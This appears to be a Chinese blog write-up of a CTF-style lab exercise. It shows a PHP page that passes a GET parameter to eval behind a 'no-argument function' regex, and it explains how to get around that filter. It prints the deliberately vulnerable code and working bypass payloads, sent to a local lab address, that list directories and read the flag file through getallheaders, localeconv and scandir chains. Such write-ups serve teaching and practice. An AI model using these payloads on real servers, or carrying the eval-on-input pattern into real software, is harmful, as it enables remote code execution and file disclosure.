无参数读文件

最新推荐文章于 2024-10-01 18:22:37 发布
最新推荐文章于 2024-10-01 18:22:37 发布
阅读量682 收藏 7
点赞数 20
文章标签: php 安全 渗透 rce rce绕过
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/banliyaoguai/article/details/141186895
版权

目录

代码

代码解析

如何绕过获取flag

第一种方法(在apache中)

​编辑

第二种方法

首先获取目录下文件

代码

<?php
highlight_file(__FILE__);
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {    
    eval($_GET['code']);
}
?>

代码解析

[^\W]+\((?R)?\)

这个正则的意思是这个正则表达式可以用于匹配带有嵌套括号的结构,例如这样adb(asdf(asdf())),也就是可以匹配无参数的函数,但是不可以以这个形式呈现a('a')

如何绕过获取flag

下面两者方法flag都在当前目录下如果再上一级目录就是可以使用dirname()这个函数

print_r(scandir(dirname(getcwd()))); //查看上一级目录的文件
print_r(scandir(next(scandir(getcwd()))));
show_source(array_rand(array_flip(scandir(dirname(chdir(dirname(getcwd())))))));//切换为上一层目录并读取文件,chdir就是切换工作路径的

第一种方法(在apache中)

我们可以使用各种函数来获取目录或者文件名

在apache2中我们可以使用getallheaders(),getallheaders()是apache_request_headers()  的别名函数,getallheaders()函数的主要作用是获取HTTP请求的所有头部信息,且这个只可以在Apache环境下使用

我们可以在header头部加一个字段,这个字段咱可以自己构造

然后我们可以使用pos或者current来取出数组中第一位的值

如下图

http://192.168.244.152/web.php?code=print_r(pos(getallheaders()));

然后执行命令

show_source()可以用来获取源代码

code=show_source(pos(getallheaders()));

第二种方法

首先获取目录下文件

可以使用以下方法 

getcwd函数是PHP中的一个内置函数,‌它的功能是获取当前脚本的工作目录的绝对路径。‌

print_r(scandir(getcwd()));

scandir('.')扫描当前目录下所有文件,但是“.”(为方便后续出现的.都用“”引起来)这个“.” 是不可以出现的因为有正则,所以要想方设法出现 .

也可以使用这个方法

获取”.“我们可以使用localeconv() 这个函数,而localeconv()这个函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是"."(后续出现的.都用双引号包裹,方便识别) ,然后我们在再使用pos()或者current()返回数组中第一个值

http://192.168.244.152/web.php?code=print_r(scandir(pos(localeconv())));

成功获取

获取“.”的方式多种多样

比如说使用时间戳获取

使用time获取时间然后localtime是把从1970-1-1零点零分到当前时间系统所偏移的秒数时间转换为本地时间,然后再使用chr返回对应的ascii码值,当出现46时“.”就出现了

http://192.168.244.152/web.php?code=print_r(scandir(chr(pos(localtime(time())))));

目录得到以后,获取flag.php

我们可以使用array_rand(array_flip()),array_flip()是交换数组的键和值,array_rand()是随机返回一个数组,然后多点几下就可以获取了

http://192.168.244.152/web.php?code=print_r(array_rand(array_flip(scandir(getcwd()))));

然后可以使用show_source获取flag

http://192.168.244.152/web.php?code=show_source(array_rand(array_flip(scandir(getcwd()))));

板栗妖怪
关注
读取xml文件中的配置参数实例
08-29
读取XML文件中的配置参数实例 读取XML文件中的配置参数实例是一种常见的应用场景,在实际开发中,我们经常需要读取XML文件中的配置参数来完成特定的任务。下面,我们将详细介绍读取XML文件中的配置参数实例。 首先...
Snp文件(S参数)查看软件 C++源码 支持S16p以下文件预览
11-19
1. 文件读取:程序需要能够识别并读取Snp文件的格式,通常这种文件的数据部分可能以ASCII或二进制格式存储,程序需要解析出幅度和相位信息。 2. 数据处理:读取到的数据需要进行适当的转换,例如将极坐标转换为直角...
ros添加配置文件yaml读取参数
渡之的博客
07-20 8290
在windos下做桌面应用开发,常用.ini文件 在做ros开发中遇到了同样的问题,一些参数需要根据需求修改,但是修改频率又不是很高,这时候可以配置一个yaml文件读取参数 首先需要在电脑上配置好yaml的库 GitHub上下载yaml-cpp的源码https://github.com/jbeder/yaml-cpp git clone https://github.com/jbeder/yaml-cpp.git 然后进入目录创建build文件编译安装 mkdir build cd buil
pandas读取与保存文件参数
m0_46926492的博客
04-21 2469
【代码】pandas读取与保存文件参数
C++从文件读取配置参数
David_BY的博客
09-15 1327
参数更改较频繁,若将参数写入到程序内,每次更改都需编译验证,为减少编译可在程序初始化过程中,从文件读取参数,可进行调参。从a.yaml文件读取数据,若不存在返回第三个默认值。
Springboot 读取配置文件参数(yml\properties)
一个程序员的专栏
12-01 4514
Springboot 读取配置文件参数,这里介绍2中方式。一种是使用注解@Value,一种是使用属性对应的方式。 (说明:我这里贴出来的配置,里面的参数命名是下划线和驼峰命名混用的,这里只是为了演示一下,我实际使用的过程中,把命名方式都调整成统一的了,配置文件用下划线,代码里面是驼峰。贴出来的命名,是挪用了weibo官方提供的 java SDK示例代码里面的配置,本身就是混用的。) Springboot默认读取的是application.yml中的,yml文件或者properties文件。如果想要自定
java从配置文件读取参数
weixin_40203707的博客
10-21 2766
读取配置文件参数
【Postman】自动化测试之读取文件作为请求参数
BY_HEY的博客
03-20 2536
使用场景:批量调用接口进行自动化测试时需要用到多组数据,这时候需要从文件读取数据进行自动化测试。
SpringBoot 文件上传和参数获取
熊老大的专栏
05-26 2932
配置文件上传大小限制(application.yml) 编写服务端接收逻辑(HttpParamContorller) 编写客户端发送逻辑(http_param.html)
Springboot注解@Value读取配置文件参数
小菜鸡的成长之路
07-15 3640
1、读取application.ym文件配置直接在类属性上@Value("${application.yml里的字段}"); 2、读取自定义Properties文件的配置: 在类上使用@PropertySource(可同时读取多个properties文件); 例子: 自定义两个properties文件: wkx.properties: wkx2.properties: ...
Jmeter参数化-读取CSV文件实现Parameters参数
hujyhfwfh2的博客
06-02 5220
1:读取CSV文件实现Parameters参数化    A:设置线程组 循环次数 读取多个Parameters参数 B:http请求的设置 渝参数化C:设置Jmeter IO读取CSV文件D:查看结果--请求数据--响应数据2:读取CSV文件实现Parameters参数化(多个参数)CSV文件如下:    A:设置线程组 有多少组数据 就设置循环多少次 或者设置多少个线程组 基本两者二选一B:有两...
VC中怎么读取文件
BlueMan
08-21 3576
一、   CStdioFile 二、   FILE* f = fopen("file name", "mode");   char buff[size];   fread(buff, size, 1, f);...
SpringBoot如何读取配置文件参数并全局使用
08-25
SpringBoot如何读取配置文件参数并全局使用 SpringBoot 框架中读取配置文件参数并全局使用是非常重要的,特别是在实际开发中,我们经常需要读取配置文件中的参数来实现灵活的配置管理。本文将主要介绍如何在 ...
pandas读取csv文件,分隔符参数sep的实例
12-25
在python中读取csv文件时,一般操作如下: import pandas as pd pd.read_csv(filename) 该文件方式,默认是以逗号“,”作为分割符,若是以其它分隔符,比如制表符“/t”...以上这篇pandas读取csv文件,分隔符参数se
spring mvc 读取xml文件数据库配置参数的方法
08-29
Spring MVC 读取 XML 文件数据库配置参数的方法 在 Spring MVC 框架中,配置参数的管理是一个非常重要的方面。如何将数据库配置参数存储在 XML 文件中,并在项目中读取它们,是一个棘手的问题。本文将为大家介绍...
PHP安装后Apache无法运行的问题
最新发布
Bingyeshinvwang的博客
10-01 258
php安装之后,修改httpd.conf无法运行Apache的解决方案
PHP反序列化2(OC绕过.wakeup绕过
2302_81328699的博客
09-26 503
PHP反序列化2(OC绕过.wakeup绕过
服务器被挂马,导致网站首页被更改怎么解决
KookeeyLena7的博客
09-27 1222
当服务器被挂马并导致网站首页被篡改时,说明服务器或网站的安全性遭到破坏。
如何使用C语言命令行参数读取文件
05-24
C语言中可以使用命令行参数读取文件,以下是一个示例代码: ```c #include <stdio.h> int main(int argc, char *argv[]) { if (argc != 2) { // 如果命令行参数不等于2,即只输入了命令而没有参数参数过多 printf("Usage: %s filename\n", argv[0]); return 1; // 返回错误码1 } FILE *file = fopen(argv[1], "r"); // 打开文件 if (file == NULL) { // 如果文件打开失败 printf("Failed to open file %s\n", argv[1]); return 1; // 返回错误码1 } // 在这里可以对文件进行读取操作 fclose(file); // 关闭文件 return 0; // 返回正常结束码0 } ``` 在命令行中运行程序时,可以输入以下命令: ``` ./program filename ``` 其中`./program`为编译后生成的可执行文件名,`filename`为要读取文件名。程序会先检查参数个数是否正确,如果正确则打开文件并进行读取操作,最后关闭文件并返回正常结束码0;如果不正确或文件打开失败,则输出错误信息并返回错误码1。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值